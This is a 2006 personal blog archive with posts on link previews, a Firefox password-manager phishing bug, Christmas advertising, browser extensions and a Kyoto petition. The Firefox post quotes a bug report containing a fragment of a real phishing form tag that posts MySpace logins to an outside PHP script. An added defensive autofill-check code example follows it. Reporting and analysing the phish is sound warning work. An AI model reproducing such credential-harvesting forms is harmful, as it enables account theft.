Archive for November 2006
Blog Moving?
Changed my mind.
Who knew!
Snap Preview and Search
A newish search company, Snap, is offering a preview for links on one’s site. It's interesting: some links take forever to load, some never seem to (apparently it's a queue issue), and others literally “snap” into existence. Perhaps they have already been “snapped” by someone else.
Anyway, to experience it, just roll your mouse over any link and with any luck you will get a thumbnail preview of the site at that link.
(Currently disabled; it was really starting to annoy me. Go look at PhotoMatt instead.)
Additionally, if you use Firefox, you can add Snap to your list of search options for your toolbar.
Found via PhotoMatt, where it's in use.
Firefox Password Storage Bug
Cross-Site Forms + Password Manager = Security Failure
A Firefox user reported the following:
I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manager!
The underlying method was so obvious that it should have raised multiple warnings. There were none at all.
It was in a MySpace profile that included this tag:
.. form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post"…
What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning.
Not only did Firefox fail to raise a warning, it auto-filled my www.myspace.com username and password into this form!! I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website.
I even confirmed in the password manager that I do not have any passwords saved for the membres.lycos.fr domain.
I realize there is a consideration for cross-site functionality on certain subdomains. However, I must say I am shocked that Firefox lacks a warning for both the POST element and the Password Manager in this case.
I would have been thoroughly fooled by this page were it not for a tiny formatting error that the phisher overlooked, and could have been easily fixed. An unsuspecting user would only have to click the Login button on this legitimate-looking page for the phish to be complete.
This appears to be a huge problem! I look forward to your response.
Read about it at Bugzilla, and delete your Firefox passwords if you have been storing them.
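One way a password manager could guard against the cross-site form in the report above, as an added example (not Firefox's code and not part of the original post): remember the origin a login was submitted to when it was saved, and fill only forms whose resolved action goes to that same origin. The function name, the `savedLogins` shape and the sample paths are assumptions.

```javascript
// Added example, not Firefox's implementation. Policy assumed here: a saved
// login remembers the origin it was submitted to, and is filled only into
// forms whose resolved action goes to that same origin.

// Constructed sample store; field names are hypothetical.
const savedLogins = [
  { origin: "http://www.myspace.com",
    submitOrigin: "http://www.myspace.com",
    username: "constructed-user" },
];

function autofillDecision(pageUrl, actionAttr, logins) {
  const page = new URL(pageUrl);
  let target;
  try {
    // A missing or empty action submits back to the page itself;
    // relative actions resolve against the page URL.
    target = new URL(actionAttr || "", pageUrl);
  } catch (e) {
    return { fill: false, reason: "unparseable action" };
  }
  if (target.protocol !== "http:" && target.protocol !== "https:") {
    return { fill: false, reason: "non-HTTP action: " + target.protocol };
  }
  const login = logins.find((l) => l.origin === page.origin);
  if (!login) {
    return { fill: false, reason: "no login saved for " + page.origin };
  }
  if (target.origin !== login.submitOrigin) {
    return { fill: false,
             reason: "form posts to " + target.origin +
                     " but login was saved for " + login.submitOrigin };
  }
  return { fill: true, reason: "action matches saved submit origin" };
}

// Case from the report: a form on a www.myspace.com page posting to
// membres.lycos.fr (the path is a constructed placeholder).
console.log(autofillDecision("http://www.myspace.com/profile",
  "http://membres.lycos.fr/placeholder.php", savedLogins));
// Legitimate same-site form with a relative action.
console.log(autofillDecision("http://www.myspace.com/", "/login", savedLogins));
```

Recording the submit origin at save time, rather than demanding that it equal the page origin, leaves room for sites that post their login form to a sibling subdomain.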
Christmas is approaching
It's the time of year in which I really start missing my Mum and Dad. It's also the time of year in which I start turning into Scrooge. Not because I have no streak of generosity or giving within me, but because of the increasing pressures on people to spend more and more money.
I was watching commercial TV last night and it seemed to me that every second advertisement was designed to encourage spending more and more and more (not just for Christmas, but just generally). There were a number of different advertisements for cars, and I got to thinking, just how many cars can one person want to buy? Nobody can afford to change their car every year, and yet, manufacturers spend billions in developing and creating new models which they then expect people will fall over themselves to buy. We only have 20 million people in this country … geeze! Then there IS the Christmas thing which is looming. When did *you* last buy someone a car for Christmas? Or a house full of furniture? Are these advertisers serious???
Oh yeah… and the junkmail is coming thick and fast. Every second item seems to be full of toys for kids. But, when you get past the dolls and toylike things, you find BIG PRICE ITEMS! When did a computer or a bicycle or a mobile phone become toys, for heavens sake??? I’m over it.
BAH, HUMBUG!!
Firefox: Extensions
I keep coming back to Firefox as my browser of choice because of the plethora of extensions available for it (though there are only a few I use regularly). I was going to write of just one here, but now, I think I’ll just list those I find most useful, and why (in no particular order).
1. Adblock Plus: Lets you block dross on the net. Right-click and banish a banner/server forever.
2. Adblock Filterset.G Updater: This retrieves an updated set of filters which work in Adblock and AdblockPlus. You still need to do your own blocking but this gives a head start.
3. Temporary Inbox: Gives you a disposable email address which is good for 6 hours. Excellent for signing up at sites which you know are going to generate tons of spam, just so you can get to see what you want to. Not good if your email address is needed in any ongoing way.
4. gMail Manager: Puts a notification area into your statusbar and allows checking of multiple gMail accounts, unlike most which check only one. Also gives you snippets of available mail.
5. Scrapbook: Collecting information has never been so easy (except with the iHarvest IE extension which is old and no longer supported). Make your own database of collected info. Excellent for researchers.
6. Videodownloader: I confess to not using this much, but if I want to, I can get videos of most kinds from most sites.
7. BBCodeXtra: If you frequent forums, you’ll find most of them use BBCode or a version of it, to display such things as bold type, different colour fonts etc. A right click in the window and selection from the context sensitive menu makes it easy to use. Works for Invision and vBulletin that I know of, and probably for phpBB as well, but I haven't tried it there myself.
I have a few more extensions but these are my favourites.
Contact Form
Reluctantly, I have had to delete my contact form. I put it there so people could contact me instead of hunting around on the site for an email address which doesn't exist. Unfortunately the spammers and scammers have now discovered that they can spam contact forms as effectively as anything else, and I have been getting increasing numbers of emailed spam via the form.
Please use the guestbook if you have a non-post related question. At least Akismet can work its magic on that.
The Kyoto Protocol
Australia and the USA have still not signed up to the Kyoto Agreement. Our respective governments have done pretty much SFA about reducing greenhouse emissions. Just enough to make it look ok once in a while, whilst keeping the banks and oil companies on side (hate to see all that sponsorship money disappear eh?)
So now you can sign a petition which will be presented to the Australian government, for Australia to become engaged with the Kyoto Protocol.
Here’s the site, go sign. It might not make a difference, but we have to try something.